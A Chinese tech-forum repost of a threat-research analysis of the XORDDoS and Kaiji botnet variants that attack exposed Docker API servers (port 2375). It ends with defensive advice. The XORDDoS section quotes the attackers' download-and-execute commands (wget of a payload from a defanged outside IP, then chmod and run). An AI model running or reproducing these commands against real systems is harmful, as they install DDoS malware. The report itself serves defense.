关闭
搜索
搜索
本版
帖子
用户
热搜:
程序员
简洁模式
高级模式
用户组: 游客
消息
提醒
新听众
我关注的
帖子
道具
勋章
任务
设置
退出
请
登录
后使用快捷导航
没有帐号?
立即注册
设为首页
收藏本站
开启辅助访问
切换到窄版
登录
or
立即注册
快捷导航
搜索
首页
论坛
BBS
MCU单片机技术
程序员交流
Linux僵尸网络最新变种现身:Docker服务器惨遭殃及
[复制链接]
作者:
qq1297699882
版块:
›
嵌入式操作系统
›
linux
发布时间:
2020-6-29 18:27:01
1224
0
返回列表
qq1297699882
当前离线
注册会员
注册会员, 积分 136, 距离下一级还需 64 积分
注册会员
注册会员, 积分 136, 距离下一级还需 64 积分
积分
136
发消息
楼主
电梯直达
qq1297699882
发表于 2020-6-29 18:27:01
|
只看该作者
|
倒序浏览
|
阅读模式
研究人员近期发现了2个攻击Docker服务器的Linux僵尸网络的变种,分别是XORDDoS 恶意软件和Kaiji DDoS恶意软件。将Docker 服务器作为目标是XORDDoS和 Kaiji恶意软件的新变化,之前这两款恶意软件的目标是云系统中的Linux 主机。最近Kaiji首次被曝影响物联网设备。攻击者常常使用僵尸网络在扫描了SSH 和Telnet端口后执行暴力破解攻击。这两款恶意软件也搜索了暴露2375 端口的Docker服务器。2375端口是Docker API使用的一个端口,用于非加密或非认证的通信。
这两个恶意软件变种的攻击方法有明显的差异。XORDDoS 攻击会利用Docker服务器来感染服务器上的容器,而Kaiji 攻击会在感染的服务器上部署自己的容器,用于DDoS 恶意软件的安装。
XORDDoS 恶意软件分析
XORDDoS 恶意软件的感染是从攻击者检索暴露Docker API端口(2375)的主机开始的。然后,发送一个命令来列出Docker服务器上的所有容器。然后,攻击者执行以下命令,用XORDDoS 恶意软件来感染所有的容器:
wget hxxp://122[.]51[.]133[.]49:10086/VIP –O VIP
chmod 777 VIP
./VIP
XORDDoS payload 使用了其他攻击中的XOR key来加密字符串,以及与C2 服务器进行通信。也可以在自己的机器上创建多个副本作为驻留机制。
图 1. XORDDoS创建多个副本的代码段
Payload会启动SYN、ACK、DNS等DDoS 攻击类型。
图 2. XORDDoS 启动不同类型DDoS攻击的代码段
恶意软件可以下载和执行下一阶段的恶意软件或对自己进行升级。
图 3. 表明XORDDoS下载和升级自己的代码段
恶意软件会收集以下与发起DDoS 攻击相关的数据:
·
CPU信息;
·
运行进程的MD5;
·
内存信息;
·
网络速度;
·
运行进程的PID。
需要注意的是XORDDoS 恶意软件变种中的大多数恶意行为都在之前的恶意软件变种中出现过。
研究人员进一步分析攻击者的URL发现,其他恶意软件也攻击过Docker API,比如Dofloo/AESDDoS Linux 僵尸网络的变种Backdoor.Linux.DOFLOO.AB。
Kaiji 恶意软件分析
与 XORDDoS 恶意软件相似,Kaiji 现在的攻击目标也是Docker 服务器。其运营者扫描了网络上暴露了2375 端口的主机。找到目标后,会部署一个伪造的ARM容器来执行Kaiji 二进制文件。
123.sh 脚本会下载和执行恶意软件payload——Linux_arm。之后,脚本会移除DDoS 操作不需要的其他的Linux二进制文件:
图 4. 下载和执行123.sh的查询
图 5. 表明移除Linux二进制文件的代码段
Payload linux_arm是Kaiji DDoS 恶意软件会执行以下DDoS 攻击:
·
ACK 攻击;
·
IPS 欺骗攻击;
·
SSH 攻击;
·
SYN 攻击;
·
SYNACK 攻击;
·
TCP 洪泛攻击;
·
UDP 洪泛攻击。
恶意软件会收集以下数据,用于前述的攻击中:
·
CPU信息;
·
目录;
·
域名;
·
主机IP 地址;
·
运行进程的PID;
·
URL 方案。
如何应对?
恶意软件变种背后的攻击者还在不断地对恶意软件进行升级、加入新的功能,因此可以发起针对攻击入口点的攻击。在云端,Docker 服务器越来越多的成为攻击者的目标。因此,研究人员建议采取以下措施来保护Docker 服务器:
·
保护容器主机安全。利用监控工具来确保容器操作系统中的主机容器的安全。
·
保护网络环境安全。使用IPS和web过滤来提供内部和外部流量的可视性。
·
确保管理栈的安全。监控和确保容器注册表的安全,锁定Kubernetes 安装。
最佳实践:
·
遵循推荐的最佳安全实践。
·
使用安全工具来扫描和确保容器安全。
参考及来源:http://blog.trendmicro.com/trendlabs-security-intelligence/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers/
本帖子中包含更多资源
您需要
登录
才可以下载或查看,没有帐号?
立即注册
收藏
0
相关帖子
•
Nginx软件企业功能应用有哪些?
•
风河与Vector合作提供基于服务的SOA可用于ADAS自动驾驶
•
统信软件打造国产操作系统的“开放生态”
•
明朝万达2021年网络安全月报(4月)
•
在文件管理机制上,linux与Windows相比谁更优秀
•
新手程序员必备5项技能,你都掌握了吗?
•
一篇文章带你了解「开源」和它的前世今生
•
悬镜安全董毅:如何通过三个步骤做好软件供应链的风险治理
•
智能汽车专题报告之软件篇:迈向SOA软件架构
•
硬核观察#300Linux创始人怒斥反疫苗言论
回复
使用道具
举报
返回列表
高级模式
B
Color
Image
Link
Quote
Code
表情
@朋友
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
回帖后跳转到最后一页
浏览过的版块
ARM
快速回复
返回顶部
返回列表